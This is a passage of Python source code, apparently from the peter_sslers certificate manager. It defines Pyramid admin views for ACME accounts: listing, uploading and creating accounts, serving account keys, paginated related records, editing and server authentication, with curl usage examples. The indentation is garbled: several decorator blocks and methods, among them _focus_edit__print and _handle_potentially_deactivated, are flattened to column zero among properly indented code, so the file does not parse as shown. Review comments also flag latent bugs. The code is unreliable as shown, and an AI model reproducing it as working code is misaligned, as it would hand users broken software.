            "POST": None,
            "GET": True,
            "example": "curl {ADMIN_PREFIX}/acme-accounts.json",
        }
    )
    @docify(
        {
            "endpoint": "/acme-accounts/{PAGE}.json",
            "section": "acme-account",
            "example": "curl {ADMIN_PREFIX}/acme-accounts/1.json",
            "variant_of": "/acme-accounts.json",
        }
    )
    def list(self):
        """Render one page of AcmeAccounts, as JSON or the mako template."""
        total = lib_db.get.get__AcmeAccount__count(self.request.api_context)
        admin_prefix = self.request.registry.settings["app_settings"]["admin_prefix"]
        url_template = "%s/acme-accounts/{0}" % admin_prefix
        if self.request.wants_json:
            url_template = "%s.json" % url_template
        (pager, offset) = self._paginate(total, url_template=url_template)
        accounts = lib_db.get.get__AcmeAccount__paginated(
            self.request.api_context, limit=items_per_page, offset=offset
        )
        if self.request.wants_json:
            return {
                "AcmeAccounts": {account.id: account.as_json for account in accounts},
                "pagination": json_pagination(total, pager),
            }
        return {
            "project": "peter_sslers",
            "AcmeAccounts_count": total,
            "AcmeAccounts": accounts,
            "pager": pager,
        }
class View_New(Handler):
@view_config(route_name="admin:acme_account:upload")
@view_config(route_name="admin:acme_account:upload|json", renderer="json")
@docify(
{
"endpoint": "/acme-account/upload.json",
"section": "acme-account",
"about": """upload an AcmeAccount and AcmeAccountKey""",
"POST": True,
"GET": None,
"examples": [
"curl --form 'account_key_file_pem=@key.pem' --form 'acme_account_provider_id=1' {ADMIN_PREFIX}/acme-account/upload.json",
"curl --form 'account_key_file_le_meta=@meta.json' 'account_key_file_le_pkey=@private_key.json' 'account_key_file_le_reg=@regr.json' {ADMIN_PREFIX}/acme-account/upload.json",
],
"form_fields": {
"account_key_file_pem": "Group A",
"acme_account_provider_id": "Group A",
"account_key_file_le_meta": "Group B",
"account_key_file_le_pkey": "Group B",
"account_key_file_le_reg": "Group B",
"account__contact": "the contact's email address for the ACME Server",
"account__private_key_cycle": "how should the PrivateKey be cycled for this account?",
},
"notes": [
"You must submit ALL items from Group A or Group B",
],
"valid_options": {
"acme_account_provider_id": "{RENDER_ON_REQUEST}",
"account__private_key_cycle": model_utils.PrivateKeyCycle._options_AcmeAccount_private_key_cycle,
},
}
)
    def upload(self):
        """Dispatch: POST performs the upload; any other method renders the
        form (HTML) or the endpoint documentation (JSON)."""
        if self.request.method == "POST":
            return self._upload__submit()
        return self._upload__print()
    def _upload__print(self):
        """Render the upload page (HTML) or the self-documenting JSON."""
        self._load_AcmeAccountProviders()
        if self.request.wants_json:
            return formatted_get_docs(self, "/acme-account/upload.json")
        # quick setup, we need a bunch of options for dropdowns...
        return render_to_response(
            "/admin/acme_account-upload.mako",
            {"AcmeAccountProviders": self.dbAcmeAccountProviders},
            self.request,
        )
    def _upload__submit(self):
        """Handle the POSTed upload form: validate, get-or-create the
        AcmeAccount, and respond with JSON or a redirect.

        Validation failures raise FormInvalid (directly or via the
        formStash.fatal_* helpers) and fall through to the error response.
        """
        try:
            (result, formStash) = formhandling.form_validate(
                self.request, schema=Form_AcmeAccount_new__file, validate_get=False
            )
            if not result:
                raise formhandling.FormInvalid()
            parser = AcmeAccountUploadParser(formStash)
            parser.require_upload(require_contact=None, require_technology=False)
            # this will have `contact` and `private_key_cycle`
            key_create_args = parser.getcreate_args
            acme_account_provider_id = key_create_args.get("acme_account_provider_id")
            if acme_account_provider_id:
                # Only validate the provider when one was submitted at all.
                self._load_AcmeAccountProviders()
                _acme_account_provider_ids__all = [
                    i.id for i in self.dbAcmeAccountProviders
                ]
                if acme_account_provider_id not in _acme_account_provider_ids__all:
                    # `formStash.fatal_field()` will raise `FormFieldInvalid(FormInvalid)`
                    formStash.fatal_field(
                        field="acme_account_provider_id",
                        message="Invalid provider submitted.",
                    )
            key_create_args["event_type"] = "AcmeAccount__insert"
            key_create_args[
                "acme_account_key_source_id"
            ] = model_utils.AcmeAccountKeySource.from_string("imported")
            try:
                (dbAcmeAccount, _is_created,) = lib_db.getcreate.getcreate__AcmeAccount(
                    self.request.api_context, **key_create_args
                )
            except errors.ConflictingObject as exc:
                # ConflictingObject: args[0] = tuple(conflicting_object, error_message_string)
                # `formStash.fatal_form()` will raise `FormFieldInvalid(FormInvalid)`
                formStash.fatal_form(message=exc.args[0][1])
            if self.request.wants_json:
                return {
                    "result": "success",
                    "AcmeAccount": dbAcmeAccount.as_json,
                    "is_created": True if _is_created else False,
                    "is_existing": False if _is_created else True,
                }
            # HTML flow: redirect to the account's focus page with status flags.
            return HTTPSeeOther(
                "%s/acme-account/%s?result=success&operation=upload%s"
                % (
                    self.request.admin_url,
                    dbAcmeAccount.id,
                    ("&is_created=1" if _is_created else "&is_existing=1"),
                )
            )
        except formhandling.FormInvalid as exc:  # noqa: F841
            if self.request.wants_json:
                return {"result": "error", "form_errors": formStash.errors}
            return formhandling.form_reprint(self.request, self._upload__print)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(route_name="admin:acme_account:new")
@view_config(route_name="admin:acme_account:new|json", renderer="json")
@docify(
{
"endpoint": "/acme-account/new.json",
"section": "acme-account",
"about": """Create a new AcmeAccount""",
"POST": True,
"GET": None,
"instructions": [
"""curl --form 'account_key_file_pem=@key.pem' --form 'acme_account_provider_id=1' {ADMIN_PREFIX}/acme-account/new.json""",
],
"form_fields": {
"acme_account_provider_id": "which provider",
"account__contact": "the contact's email address for the ACME Server",
"account__private_key_cycle": "how should the PrivateKey be cycled for this account?",
"account__private_key_technology": "what is the key technology preference for this account?",
},
"valid_options": {
"acme_account_provider_id": "{RENDER_ON_REQUEST}",
"account__private_key_cycle": model_utils.PrivateKeyCycle._options_AcmeAccount_private_key_cycle,
"account__private_key_technology": model_utils.KeyTechnology._options_AcmeAccount_private_key_technology,
},
}
)
    def new(self):
        """Dispatch: POST creates the account; any other method renders the
        form (HTML) or the endpoint documentation (JSON)."""
        if self.request.method == "POST":
            return self._new__submit()
        return self._new__print()
    def _new__print(self):
        """Render the new-account page (HTML) or the self-documenting JSON."""
        self._load_AcmeAccountProviders()
        if self.request.wants_json:
            return formatted_get_docs(self, "/acme-account/new.json")
        # quick setup, we need a bunch of options for dropdowns...
        return render_to_response(
            "/admin/acme_account-new.mako",
            {"AcmeAccountProviders": self.dbAcmeAccountProviders},
            self.request,
        )
    def _new__submit(self):
        """POST handler: validate the form, create + register a new AcmeAccount.

        Generates a fresh account key, persists the account, then registers it
        against the selected ACME provider.  Duplicate-account conflicts from
        the ACME server are merged into the pre-existing local record.
        Returns JSON or an HTTPSeeOther redirect; form errors re-render the form.
        """
        try:
            (result, formStash) = formhandling.form_validate(
                self.request, schema=Form_AcmeAccount_new__auth, validate_get=False
            )
            if not result:
                raise formhandling.FormInvalid()
            self._load_AcmeAccountProviders()
            _acme_account_provider_ids__all = [
                i.id for i in self.dbAcmeAccountProviders
            ]
            _acme_account_provider_ids__enabled = [
                i.id for i in self.dbAcmeAccountProviders if i.is_enabled
            ]
            acme_account_provider_id = formStash.results["acme_account_provider_id"]
            if acme_account_provider_id not in _acme_account_provider_ids__all:
                # `formStash.fatal_field()` will raise `FormFieldInvalid(FormInvalid)`
                formStash.fatal_field(
                    field="acme_account_provider_id",
                    message="Invalid provider submitted.",
                )
            if acme_account_provider_id not in _acme_account_provider_ids__enabled:
                # `formStash.fatal_field()` will raise `FormFieldInvalid(FormInvalid)`
                formStash.fatal_field(
                    field="acme_account_provider_id",
                    message="This provider is no longer enabled.",
                )
            parser = AcmeAccountUploadParser(formStash)
            parser.require_new(require_contact=True)
            # this will have `contact` and `private_key_cycle`
            key_create_args = parser.getcreate_args
            key_pem = cert_utils.new_account_key()  # rsa_bits=None
            key_create_args["key_pem"] = key_pem
            key_create_args["event_type"] = "AcmeAccount__create"
            key_create_args[
                "acme_account_key_source_id"
            ] = model_utils.AcmeAccountKeySource.from_string("generated")
            dbAcmeAccount = None
            _dbAcmeAccount = None
            try:
                (
                    _dbAcmeAccount,
                    _is_created,
                ) = lib_db.getcreate.getcreate__AcmeAccount(
                    self.request.api_context, **key_create_args
                )
                # result is either: `new-account` or `existing-account`
                # failing will raise an exception
                # NOTE(review): `authenticatedUser` is unused after this call;
                # the call is kept for its registration side effect.
                authenticatedUser = lib_db.actions_acme.do__AcmeAccount_AcmeV2_register(
                    self.request.api_context, _dbAcmeAccount
                )
                dbAcmeAccount = _dbAcmeAccount
            except errors.ConflictingObject as exc:
                # this happens via `getcreate__AcmeAccount`
                # * args[0] = tuple(conflicting_object, error_message_string)
                # NOTE(review): `_dbAcmeAccountDuplicate` is unused here, since
                # `fatal_field()` raises immediately.
                _dbAcmeAccountDuplicate = exc.args[0][0]
                # `formStash.fatal_field()` will raise `FormFieldInvalid(FormInvalid)`
                formStash.fatal_field(
                    field="account__contact",
                    message=exc.args[0][1],
                )
            except errors.AcmeDuplicateAccount as exc:
                # this happens via `do__AcmeAccount_AcmeV2_register`
                # args[0] MUST be the duplicate AcmeAccount
                _dbAcmeAccountDuplicate = exc.args[0]
                # the 'Duplicate' account was the earlier account and therefore
                # it is our merge Target
                lib_db.update.update_AcmeAccount_from_new_duplicate(
                    self.request.api_context, _dbAcmeAccountDuplicate, _dbAcmeAccount
                )
                dbAcmeAccount = _dbAcmeAccountDuplicate
            if self.request.wants_json:
                return {
                    "result": "success",
                    "AcmeAccount": dbAcmeAccount.as_json,
                    "is_created": True if _is_created else False,
                    "is_existing": False if _is_created else True,
                }
            return HTTPSeeOther(
                "%s/acme-account/%s?result=success&operation=new%s"
                % (
                    self.request.admin_url,
                    dbAcmeAccount.id,
                    ("&is_created=1" if _is_created else "&is_existing=1"),
                )
            )
        except errors.AcmeServerError as exc:
            # ACME server rejected the registration: surface it as a form error
            if self.request.wants_json:
                return {"result": "error", "form_errors": formStash.errors}
            formStash.register_error_main_exception(exc)
            return formhandling.form_reprint(self.request, self._new__print)
        except formhandling.FormInvalid as exc:  # noqa: F841
            if self.request.wants_json:
                return {"result": "error", "form_errors": formStash.errors}
            return formhandling.form_reprint(self.request, self._new__print)
class View_Focus(Handler):
    """Read-only admin views focused on a single AcmeAccount record."""
    # cache for the focused AcmeAccount; populated lazily by `_focus()`
    dbAcmeAccount = None
    def _focus(self):
        """Load and cache the AcmeAccount identified by the route's `id`.

        Side effect: sets `self._focus_url`, the admin URL prefix the other
        views use to build links and redirects.
        Raises `HTTPNotFound` if no matching record exists.
        """
        if self.dbAcmeAccount is None:
            dbAcmeAccount = lib_db.get.get__AcmeAccount__by_id(
                self.request.api_context,
                self.request.matchdict["id"],
            )
            if not dbAcmeAccount:
                raise HTTPNotFound("the key was not found")
            self.dbAcmeAccount = dbAcmeAccount
            self._focus_url = "%s/acme-account/%s" % (
                self.request.admin_url,
                self.dbAcmeAccount.id,
            )
        return self.dbAcmeAccount
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    @view_config(
        route_name="admin:acme_account:focus",
        renderer="/admin/acme_account-focus.mako",
    )
    @view_config(route_name="admin:acme_account:focus|json", renderer="json")
    @docify(
        {
            "endpoint": "/acme-account/{ID}.json",
            "section": "acme-account",
            "about": """AcmeAccount record""",
            "POST": None,
            "GET": True,
            "example": "curl {ADMIN_PREFIX}/acme-account/1.json",
        }
    )
    def focus(self):
        """Show the focused AcmeAccount (HTML page, or JSON with raw-key URLs)."""
        dbAcmeAccount = self._focus()
        if self.request.wants_json:
            _prefix = "%s" % self._focus_url
            return {
                "AcmeAccount": dbAcmeAccount.as_json,
                "raw": {
                    "pem.txt": "%s/key.pem.txt" % _prefix,
                    "pem": "%s/key.pem" % _prefix,
                    "der": "%s/key.key" % _prefix,
                },
            }
        return {"project": "peter_sslers", "AcmeAccount": dbAcmeAccount}
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    @view_config(route_name="admin:acme_account:focus:raw", renderer="string")
    @docify(
        {
            "endpoint": "/acme-account/{ID}/key.pem",
            "section": "acme-account",
            "about": """AcmeAccount focus. Active key as PEM""",
            "POST": None,
            "GET": True,
            "example": "curl {ADMIN_PREFIX}/acme-account/1/key.pem",
        }
    )
    @docify(
        {
            "endpoint": "/acme-account/{ID}/key.pem.txt",
            "section": "acme-account",
            "about": """AcmeAccount focus. Active key as PEM.txt""",
            "POST": None,
            "GET": True,
            "example": "curl {ADMIN_PREFIX}/acme-account/1/key.pem.txt",
        }
    )
    @docify(
        {
            "endpoint": "/acme-account/{ID}/key.key",
            "section": "acme-account",
            "about": """AcmeAccount focus. Active key as pkcs8 (DER)""",
            "POST": None,
            "GET": True,
            "example": "curl {ADMIN_PREFIX}/acme-account/1/key.key",
        }
    )
    def focus_raw(self):
        """Serve the account's active key in the requested raw `format`.

        `pem` sets a PEM content-type; `pem.txt` keeps the default text
        content-type; `key` converts the PEM to DER (pkcs8).
        NOTE(review): an unrecognized `format` falls through and returns None.
        """
        dbAcmeAccount = self._focus()
        if self.request.matchdict["format"] == "pem":
            self.request.response.content_type = "application/x-pem-file"
            return dbAcmeAccount.acme_account_key.key_pem
        elif self.request.matchdict["format"] == "pem.txt":
            return dbAcmeAccount.acme_account_key.key_pem
        elif self.request.matchdict["format"] == "key":
            self.request.response.content_type = "application/pkcs8"
            as_der = cert_utils.convert_pem_to_der(
                pem_data=dbAcmeAccount.acme_account_key.key_pem
            )
            return as_der
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    @view_config(route_name="admin:acme_account:focus:parse|json", renderer="json")
    @docify(
        {
            "endpoint": "/acme-account/{ID}/parse.json",
            "section": "acme-account",
            "about": """AcmeAccount focus. Active key, parsed""",
            "POST": None,
            "GET": True,
            "example": "curl {ADMIN_PREFIX}/acme-account/1/parse.json",
        }
    )
    def focus_parse_json(self):
        """Return the focused AcmeAccount rendered as JSON."""
        dbAcmeAccount = self._focus()
        return {
            "AcmeAccount": dbAcmeAccount.as_json,
        }
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    @view_config(
        route_name="admin:acme_account:focus:acme_authorizations",
        renderer="/admin/acme_account-focus-acme_authorizations.mako",
    )
    @view_config(
        route_name="admin:acme_account:focus:acme_authorizations_paginated",
        renderer="/admin/acme_account-focus-acme_authorizations.mako",
    )
    @view_config(
        route_name="admin:acme_account:focus:acme_authorizations|json",
        renderer="json",
    )
    @view_config(
        route_name="admin:acme_account:focus:acme_authorizations_paginated|json",
        renderer="json",
    )
    @docify(
        {
            "endpoint": "/acme-account/{ID}/acme-authorizations.json",
            "section": "acme-account",
            "about": """AcmeAccount: Focus. list AcmeAuthorizations(s)""",
            "POST": None,
            "GET": True,
            "example": "curl {ADMIN_PREFIX}/acme-account/1/acme-authorizations.json",
        }
    )
    @docify(
        {
            "endpoint": "/acme-account/{ID}/acme-authorizations/{PAGE}.json",
            "section": "acme-account",
            "example": "curl {ADMIN_PREFIX}/acme-account/1/acme-authorizations/1.json",
            "variant_of": "/acme-account/{ID}/acme-authorizations.json",
        }
    )
    def related__AcmeAuthorizations(self):
        """Paginated AcmeAuthorizations for the focused account.

        The optional `status` query param filters the listing; only
        "active" and "active-expired" are honored, anything else means "all".
        """
        dbAcmeAccount = self._focus()
        url_status = self.request.params.get("status")
        if url_status not in ("active", "active-expired"):
            url_status = ""
        if url_status == "active":
            sidenav_option = "active"
        elif url_status == "active-expired":
            sidenav_option = "active-expired"
        else:
            sidenav_option = "all"
        # NOTE(review): `sidenav_option` is computed but not used in this
        # method's return values — presumably intended for the template; verify.
        active_only = True if url_status == "active" else False
        expired_only = True if url_status == "active-expired" else False
        items_count = lib_db.get.get__AcmeAuthorization__by_AcmeAccountId__count(
            self.request.api_context,
            dbAcmeAccount.id,
            active_only=active_only,
            expired_only=expired_only,
        )
        url_template = "%s/acme-authorizations/{0}" % self._focus_url
        if self.request.wants_json:
            url_template = "%s.json" % url_template
        if url_status:
            url_template = "%s?status=%s" % (url_template, url_status)
        (pager, offset) = self._paginate(items_count, url_template=url_template)
        items_paged = lib_db.get.get__AcmeAuthorization__by_AcmeAccountId__paginated(
            self.request.api_context,
            dbAcmeAccount.id,
            active_only=active_only,
            expired_only=expired_only,
            limit=items_per_page,
            offset=offset,
        )
        if self.request.wants_json:
            _authorizations = [k.as_json for k in items_paged]
            return {
                "AcmeAuthorizations": _authorizations,
                "pagination": json_pagination(items_count, pager),
            }
        return {
            "project": "peter_sslers",
            "AcmeAccount": dbAcmeAccount,
            "AcmeAuthorizations_count": items_count,
            "AcmeAuthorizations": items_paged,
            "pager": pager,
        }
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    @view_config(
        route_name="admin:acme_account:focus:acme_account_keys",
        renderer="/admin/acme_account-focus-acme_account_keys.mako",
    )
    @view_config(
        route_name="admin:acme_account:focus:acme_account_keys_paginated",
        renderer="/admin/acme_account-focus-acme_account_keys.mako",
    )
    @view_config(
        route_name="admin:acme_account:focus:acme_account_keys|json",
        renderer="json",
    )
    @view_config(
        route_name="admin:acme_account:focus:acme_account_keys_paginated|json",
        renderer="json",
    )
    @docify(
        {
            "endpoint": "/acme-account/{ID}/acme-account-keys.json",
            "section": "acme-account",
            "about": """AcmeAccount: Focus. list AcmeAccountKeys(s)""",
            "POST": None,
            "GET": True,
            "example": "curl {ADMIN_PREFIX}/acme-account/1/acme-account-keys.json",
        }
    )
    @docify(
        {
            "endpoint": "/acme-account/{ID}/acme-account-keys/{PAGE}.json",
            "section": "acme-account",
            "example": "curl {ADMIN_PREFIX}/acme-account/1/acme-account-keys/1.json",
            "variant_of": "/acme-account/{ID}/acme-account-keys.json",
        }
    )
    def related__AcmeAccountKeys(self):
        """Paginated AcmeAccountKeys for the focused account (HTML or JSON)."""
        dbAcmeAccount = self._focus()
        items_count = lib_db.get.get__AcmeAccountKey__by_AcmeAccountId__count(
            self.request.api_context,
            dbAcmeAccount.id,
        )
        url_template = "%s/acme-account-keys/{0}" % self._focus_url
        if self.request.wants_json:
            url_template = "%s.json" % url_template
        (pager, offset) = self._paginate(items_count, url_template=url_template)
        items_paged = lib_db.get.get__AcmeAccountKey__by_AcmeAccountId__paginated(
            self.request.api_context,
            dbAcmeAccount.id,
            limit=items_per_page,
            offset=offset,
        )
        if self.request.wants_json:
            _acme_account_keys = [k.as_json for k in items_paged]
            return {
                "AcmeAccountKeys": _acme_account_keys,
                "pagination": json_pagination(items_count, pager),
            }
        return {
            "project": "peter_sslers",
            "AcmeAccount": dbAcmeAccount,
            "AcmeAccountKeys_count": items_count,
            "AcmeAccountKeys": items_paged,
            "pager": pager,
        }
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    @view_config(
        route_name="admin:acme_account:focus:acme_orders",
        renderer="/admin/acme_account-focus-acme_orders.mako",
    )
    @view_config(
        route_name="admin:acme_account:focus:acme_orders_paginated",
        renderer="/admin/acme_account-focus-acme_orders.mako",
    )
    @docify(
        {
            "endpoint": "/acme-account/{ID}/acme-orders.json",
            "section": "acme-account",
            "about": """AcmeAccount: Focus. list AcmeOrder(s)""",
            "POST": None,
            "GET": True,
            "example": "curl {ADMIN_PREFIX}/acme-account/1/acme-orders.json",
        }
    )
    @docify(
        {
            "endpoint": "/acme-account/{ID}/acme-orders/{PAGE}.json",
            "section": "acme-account",
            "example": "curl {ADMIN_PREFIX}/acme-account/1/acme-orders/1.json",
            "variant_of": "/acme-account/{ID}/acme-orders.json",
        }
    )
    def related__AcmeOrders(self):
        """Paginated AcmeOrders for the focused account (HTML only)."""
        dbAcmeAccount = self._focus()
        items_count = lib_db.get.get__AcmeOrder__by_AcmeAccountId__count(
            self.request.api_context, dbAcmeAccount.id
        )
        url_template = "%s/acme-orders/{0}" % self._focus_url
        (pager, offset) = self._paginate(items_count, url_template=url_template)
        items_paged = lib_db.get.get__AcmeOrder__by_AcmeAccountId__paginated(
            self.request.api_context,
            dbAcmeAccount.id,
            limit=items_per_page,
            offset=offset,
        )
        return {
            "project": "peter_sslers",
            "AcmeAccount": dbAcmeAccount,
            "AcmeOrders_count": items_count,
            "AcmeOrders": items_paged,
            "pager": pager,
        }
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    @view_config(
        route_name="admin:acme_account:focus:private_keys",
        renderer="/admin/acme_account-focus-private_keys.mako",
    )
    @view_config(
        route_name="admin:acme_account:focus:private_keys_paginated",
        renderer="/admin/acme_account-focus-private_keys.mako",
    )
    @docify(
        {
            "endpoint": "/acme-account/{ID}/private-keys.json",
            "section": "acme-account",
            "about": """AcmeAccount: Focus. list PrivateKeys(s)""",
            "POST": None,
            "GET": True,
            "example": "curl {ADMIN_PREFIX}/acme-account/1/private-keys.json",
        }
    )
    @docify(
        {
            "endpoint": "/acme-account/{ID}/private-keys/{PAGE}.json",
            "section": "acme-account",
            "example": "curl {ADMIN_PREFIX}/acme-account/1/private-keys/1.json",
            "variant_of": "/acme-account/{ID}/private-keys.json",
        }
    )
    def related__PrivateKeys(self):
        """Paginated PrivateKeys owned by the focused account (HTML only)."""
        dbAcmeAccount = self._focus()
        items_count = lib_db.get.get__PrivateKey__by_AcmeAccountIdOwner__count(
            self.request.api_context, dbAcmeAccount.id
        )
        url_template = "%s/private-keys/{0}" % self._focus_url
        (pager, offset) = self._paginate(items_count, url_template=url_template)
        items_paged = lib_db.get.get__PrivateKey__by_AcmeAccountIdOwner__paginated(
            self.request.api_context,
            dbAcmeAccount.id,
            limit=items_per_page,
            offset=offset,
        )
        return {
            "project": "peter_sslers",
            "AcmeAccount": dbAcmeAccount,
            "PrivateKeys_count": items_count,
            "PrivateKeys": items_paged,
            "pager": pager,
        }
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    @view_config(
        route_name="admin:acme_account:focus:certificate_signeds",
        renderer="/admin/acme_account-focus-certificate_signeds.mako",
    )
    @view_config(
        route_name="admin:acme_account:focus:certificate_signeds_paginated",
        renderer="/admin/acme_account-focus-certificate_signeds.mako",
    )
    def related__CertificateSigneds(self):
        """Paginated CertificateSigneds for the focused account (HTML only)."""
        dbAcmeAccount = self._focus()
        items_count = lib_db.get.get__CertificateSigned__by_AcmeAccountId__count(
            self.request.api_context, dbAcmeAccount.id
        )
        url_template = "%s/certificate-signeds/{0}" % self._focus_url
        (pager, offset) = self._paginate(items_count, url_template=url_template)
        items_paged = lib_db.get.get__CertificateSigned__by_AcmeAccountId__paginated(
            self.request.api_context,
            dbAcmeAccount.id,
            limit=items_per_page,
            offset=offset,
        )
        return {
            "project": "peter_sslers",
            "AcmeAccount": dbAcmeAccount,
            "CertificateSigneds_count": items_count,
            "CertificateSigneds": items_paged,
            "pager": pager,
        }
    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    @view_config(
        route_name="admin:acme_account:focus:queue_certificates",
        renderer="/admin/acme_account-focus-queue_certificates.mako",
    )
    @view_config(
        route_name="admin:acme_account:focus:queue_certificates_paginated",
        renderer="/admin/acme_account-focus-queue_certificates.mako",
    )
    def related__QueueCertificates(self):
        """Paginated QueueCertificates for the focused account (HTML only)."""
        dbAcmeAccount = self._focus()
        items_count = lib_db.get.get__QueueCertificate__by_AcmeAccountId__count(
            self.request.api_context, dbAcmeAccount.id
        )
        url_template = "%s/queue-certificates/{0}" % self._focus_url
        (pager, offset) = self._paginate(items_count, url_template=url_template)
        items_paged = lib_db.get.get__QueueCertificate__by_AcmeAccountId__paginated(
            self.request.api_context,
            dbAcmeAccount.id,
            limit=items_per_page,
            offset=offset,
        )
        return {
            "project": "peter_sslers",
            "AcmeAccount": dbAcmeAccount,
            "QueueCertificates_count": items_count,
            "QueueCertificates": items_paged,
            "pager": pager,
        }
class View_Focus_Manipulate(View_Focus):
    @view_config(route_name="admin:acme_account:focus:edit")
    @view_config(route_name="admin:acme_account:focus:edit|json", renderer="json")
    @docify(
        {
            "endpoint": "/acme-account/{ID}/edit.json",
            "section": "acme-account",
            "about": """AcmeAccount: Edit""",
            "POST": True,
            "GET": None,
            "example": "curl {ADMIN_PREFIX}/acme-account/1/edit.json",
            "instructions": [
                """curl --form 'account__private_key_cycle=certificate'"""
                """ --form 'account__private_key_technology=rsa'"""
                """ {ADMIN_PREFIX}/acme-account/{ID}/edit.json""",
            ],
            "form_fields": {
                "account__private_key_cycle": "option for cycling the PrivateKey on renewals",
                "account__private_key_technology": "what is the key technology preference for this account?",
            },
            "valid_options": {
                "account__private_key_cycle": model_utils.PrivateKeyCycle._options_AcmeAccount_private_key_cycle,
                "account__private_key_technology": model_utils.KeyTechnology._options_AcmeAccount_private_key_technology,
            },
        }
    )
    def focus_edit(self):
        """Edit the focused AcmeAccount: POST submits, anything else renders the form."""
        dbAcmeAccount = self._focus()
        if self.request.method == "POST":
            return self._focus_edit__submit()
        return self._focus_edit__print()
def _focus_edit__print(self):
if self.request.wants_json:
return formatted_get_docs(self, "/acme-account/{ID}/edit.json")
return render_to_response(
"/admin/acme_account-focus-edit.mako",
{"AcmeAccount": self.dbAcmeAccount},
self.request,
)
    def _focus_edit__submit(self):
        """POST handler: apply private-key-cycle / key-technology edits.

        Records an `AcmeAccount__edit` OperationsEvent with old/new values and
        redirects (or returns JSON) on success; form errors re-render the form.
        NOTE(review): if neither field actually changed, `event_status` is
        never assigned and the bookkeeping below would raise NameError —
        presumably the form always submits a change; confirm.
        """
        try:
            (result, formStash) = formhandling.form_validate(
                self.request, schema=Form_AcmeAccount_edit, validate_get=False
            )
            if not result:
                raise formhandling.FormInvalid()
            event_type = model_utils.OperationsEventType.from_string(
                "AcmeAccount__edit"
            )
            event_payload_dict = utils.new_event_payload_dict()
            event_payload_dict["acme_account_id"] = self.dbAcmeAccount.id
            event_payload_dict["action"] = "edit"
            event_payload_dict["edit"] = {
                "old": {},
                "new": {},
            }
            private_key_cycle = formStash.results["account__private_key_cycle"]
            if private_key_cycle != self.dbAcmeAccount.private_key_cycle:
                try:
                    event_payload_dict["edit"]["old"][
                        "private_key_cycle"
                    ] = self.dbAcmeAccount.private_key_cycle
                    event_payload_dict["edit"]["new"][
                        "private_key_cycle"
                    ] = private_key_cycle
                    event_status = lib_db.update.update_AcmeAccount__private_key_cycle(
                        self.request.api_context,
                        self.dbAcmeAccount,
                        private_key_cycle,
                    )
                except errors.InvalidTransition as exc:
                    # `formStash.fatal_form(` will raise a `FormInvalid()`
                    formStash.fatal_form(message=exc.args[0])
            private_key_technology = formStash.results[
                "account__private_key_technology"
            ]
            if private_key_technology != self.dbAcmeAccount.private_key_technology:
                try:
                    event_payload_dict["edit"]["old"][
                        "private_key_technology"
                    ] = self.dbAcmeAccount.private_key_technology
                    event_payload_dict["edit"]["new"][
                        "private_key_technology"
                    ] = private_key_technology
                    event_status = (
                        lib_db.update.update_AcmeAccount__private_key_technology(
                            self.request.api_context,
                            self.dbAcmeAccount,
                            private_key_technology,
                        )
                    )
                except errors.InvalidTransition as exc:
                    # `formStash.fatal_form(` will raise a `FormInvalid()`
                    formStash.fatal_form(message=exc.args[0])
            # bookkeeping
            dbOperationsEvent = lib_db.logger.log__OperationsEvent(
                self.request.api_context, event_type, event_payload_dict
            )
            lib_db.logger._log_object_event(
                self.request.api_context,
                dbOperationsEvent=dbOperationsEvent,
                event_status_id=model_utils.OperationsObjectEventStatus.from_string(
                    event_status
                ),
                dbAcmeAccount=self.dbAcmeAccount,
            )
            if self.request.wants_json:
                return {
                    "result": "success",
                    "AcmeAccount": self.dbAcmeAccount.as_json,
                }
            url_success = "%s?result=success&operation=edit" % (self._focus_url,)
            return HTTPSeeOther(url_success)
        except formhandling.FormInvalid as exc:  # noqa: F841
            if self.request.wants_json:
                return {"result": "error", "form_errors": formStash.errors}
            return formhandling.form_reprint(self.request, self._focus_edit__print)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def _handle_potentially_deactivated(self, exc):
if exc.args[0] == 403:
if isinstance(exc.args[1], dict):
info = exc.args[1]
# pebble and bounder use the same strings
if info.get("type") == "urn:ietf:params:acme:error:unauthorized":
if (
info.get("detail")
== "An account with the provided public key exists but is deactivated"
):
if not self.dbAcmeAccount.timestamp_deactivated:
lib_db.update.update_AcmeAccount__set_deactivated(
self.request.api_context, self.dbAcmeAccount
)
self.request.api_context.dbSession.flush(
objects=[self.dbAcmeAccount]
)
return True
return False
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    @view_config(
        route_name="admin:acme_account:focus:acme_server:authenticate",
        renderer=None,
    )
    @view_config(
        route_name="admin:acme_account:focus:acme_server:authenticate|json",
        renderer="json",
    )
    @docify(
        {
            "endpoint": "/acme-account/{ID}/acme-server/authenticate.json",
            "section": "acme-account",
            "about": """AcmeAccount: Focus. ACME Server - Authenticate""",
            "summary": """Authenticate the key against the provider's new-reg endpoint""",
            "POST": True,
            "GET": None,
            "instructions": [
                """curl -X POST {ADMIN_PREFIX}/acme-account/{ID}/acme-server/authenticate.json""",
            ],
        }
    )
    def focus__acme_server_authenticate(self):
        """
        this just hits the api, hoping we authenticate correctly.

        Accounts that cannot authenticate get an error response/redirect;
        otherwise POST dispatches to submit, anything else to print.
        """
        dbAcmeAccount = self._focus()
        if not dbAcmeAccount.is_can_authenticate:
            error_message = "This AcmeAccount can not Authenticate"
            if self.request.wants_json:
                return {
                    "error": error_message,
                }
            url_error = (
                "%s?result=error&error=%s&operation=acme-server--authenticate"
                % (
                    self._focus_url,
                    error_message.replace(" ", "+"),
                )
            )
            return HTTPSeeOther(url_error)
        if self.request.method == "POST":
            return self._focus__authenticate__submit()
        return self._focus__authenticate__print()
def _focus__authenticate__print(self):
dbAcmeAccount = self._focus()
if self.request.wants_json:
return formatted_get_docs(
self, "/acme-account/{ID}/acme-server/authenticate.json"
)
url_post_required = (
"%s?result=error&error=post+required&operation=acme-server--authenticate"
% (self._focus_url,)
)
return HTTPSeeOther(url_post_required)
